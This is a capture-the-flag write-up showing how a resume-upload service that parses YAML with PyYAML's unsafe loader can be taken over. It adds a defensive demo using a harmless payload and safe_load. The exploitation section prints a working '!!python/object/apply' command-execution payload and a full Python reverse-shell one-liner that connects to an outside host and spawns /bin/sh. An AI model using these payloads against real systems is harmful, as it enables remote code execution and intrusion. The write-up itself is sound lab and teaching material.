Tags: deserialization pyyaml 

Rating: 3.0

# HINT
------------------------

Writing your resume on word is for rookies.
Real programmers use yaml.

## Enumeration
--------------------------------------

< HTTP/1.1 200 OK
< server: gunicorn/20.0.4

gunicorn -> a Python WSGI HTTP server

So we can assume that the YAML parser is implemented in Python, and the most commonly used one is PyYAML.

yaml.load() with Loader=yaml.UnsafeLoader (or the unsafe default loader of PyYAML releases before 5.1) constructs arbitrary Python objects from tags such as `!!python/object/apply`, which can lead to RCE.

More info: https://net-square.com/yaml-deserialization-attack-in-python.html
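As an added illustration (not part of the original write-up, and assuming PyYAML is installed): the same `!!python/object/apply` tag aimed at a harmless callable shows the unsafe loader calling whatever Python name the document asks for, while `yaml.safe_load()` refuses the write-up's payload shape outright.

```python
"""Why yaml.load() with UnsafeLoader is dangerous, and what safe_load() does instead."""
import yaml
from yaml.constructor import ConstructorError

# Constructed sample: same tag family as the write-up's payload, but pointing at a
# harmless callable (math.sqrt) so the demo shows code execution without side effects.
BENIGN_APPLY = '!!python/object/apply:math.sqrt [16]'

# Constructed "resume" carrying the write-up's first payload shape. It is only ever
# handed to the safe loader here, so nothing is executed.
RESUME_WITH_PAYLOAD = """
name: Jane Doe
skills: !!python/object/apply:subprocess.check_output ["ls"]
"""


def parse_unsafe(text):
    """The vulnerable pattern: UnsafeLoader imports and calls the name in the tag."""
    return yaml.load(text, Loader=yaml.UnsafeLoader)


def parse_resume(text):
    """Hardened version: SafeLoader only builds plain data (str, int, list, dict, ...)."""
    return yaml.safe_load(text)


def rejects_payload(text):
    """True when safe_load refuses the document because of a python/* tag.

    Logging this exception is also a cheap detection signal: benign resumes never
    contain 'tag:yaml.org,2002:python/...' tags.
    """
    try:
        yaml.safe_load(text)
    except ConstructorError as exc:
        return "python/object/apply" in str(exc)
    return False


if __name__ == "__main__":
    print("unsafe loader ran math.sqrt(16) ->", parse_unsafe(BENIGN_APPLY))
    print("safe loader rejected payload ->", rejects_payload(RESUME_WITH_PAYLOAD))
    print("safe loader on a clean resume ->", parse_resume("name: Jane Doe\nskills: [python]"))
```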

## EXPLOITATION
--------------------------------------------

Let us pass our malicious serialized payload in a value that the application reflects back to us.

`!!python/object/apply:subprocess.check_output ["ls"]`

![serialized](https://i.ibb.co/KsMywTr/image.png)

![deserialized](https://i.ibb.co/qnKXq1y/image.png)

We have managed to get RCE, but we are still unable to read the contents of the flag.

Let's try a reverse shell.

```
# Inner double quotes are escaped as \" so the outer YAML double-quoted scalar stays intact.
!!python/object/apply:os.system ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"8.8.8.8\",16731));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]
```

I have created an auto-exploit tool for this challenge; check my GitHub.

[Github - ZyperX](https://github.com/ZyperX/AppSec-IL-Resume.yml)